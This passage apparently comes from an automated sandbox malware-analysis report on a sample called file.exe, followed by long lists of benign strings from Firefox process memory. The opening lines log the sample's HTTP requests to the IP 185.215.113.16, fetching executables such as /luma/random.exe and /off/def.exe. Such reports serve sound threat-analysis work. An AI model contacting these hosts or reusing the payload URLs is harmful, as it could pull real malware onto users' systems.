Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EE0C0 recv,recv,recv,recv, 0_2_009EE0C0
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://web-assets.toggl.com/app/assets/scripts/*.js*://pub.doubleverify.com/signals/pub.js**://connect.facebook.net/*/sdk.js**://www.everestjs.net/static/st.v3.js**://libs.coremetrics.com/eluminate.jspictureinpicture%40mozilla.org:1.0.0*://auth.9c9media.ca/auth/main.jsFileUtils_closeSafeFileOutputStream@mozilla.org/network/safe-file-output-stream;1webcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svgFileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.jsFileUtils_openAtomicFileOutputStream*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*@mozilla.org/network/atomic-file-output-stream;1FileUtils_openSafeFileOutputStream*://cdn.branch.io/branch-latest.min.js*resource://gre/modules/addons/XPIProvider.jsm*://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.google-analytics.com/analytics.js**://www.googletagservices.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/gtm/js**://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsWEBEXT_EVENTPAGE_IDLE_RESULT_COUNT equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php*sessionstore.resuming_after_os_restart equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B82F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Failed to listen. Listener already attached.No callback set for this channel.devtools.performance.popup.feature-flagFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=defaultbrowser.urlbar.dnsResolveFullyQualifiedNames@mozilla.org/network/protocol;1?name=filereleaseDistinctSystemPrincipalLoaderresource://devtools/server/devtools-server.js^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPdevtools.performance.recording.ui-base-urldevtools/client/framework/devtoolsDevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools/client/framework/devtools-browserDevTools telemetry entry point failed: WebChannel/this._originCheckCallback@mozilla.org/uriloader/handler-service;1^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to execute WebChannel callback:browser.fixup.dns_first_for_single_words^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/dom/slow-script-debug;1Unable to start devtools server on {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataresource://devtools/shared/security/socket.jsJSON Viewer's onSave failed in startPersistencebrowser.fixup.domainsuffixwhitelist.https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inbox.lv/compose?to=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/JSONFile.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1resource://gre/modules/ExtHandlerService.sys.mjsextractScheme/fixupChangedProtocol<{33d75835-722f-42c0-89cc-44f328e56a86}http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/network/file-input-stream;1@mozilla.org/uriloader/dbus-handler-app;1Can't invoke URIFixup in the content processScheme should be either http or httpsisDownloadsImprovementsAlreadyMigratedSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argument@mozilla.org/network/input-stream-pump;1https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/scriptableinputstream;1Non-zero amount of bytes must be specifiedhttps://mail.yandex.ru/compose?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.previousHandler.preferredActionpdfjs.previousHan
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing downloading patch because we installed a different patch before it finisheddownloading.UpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/AND bookmarked equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", 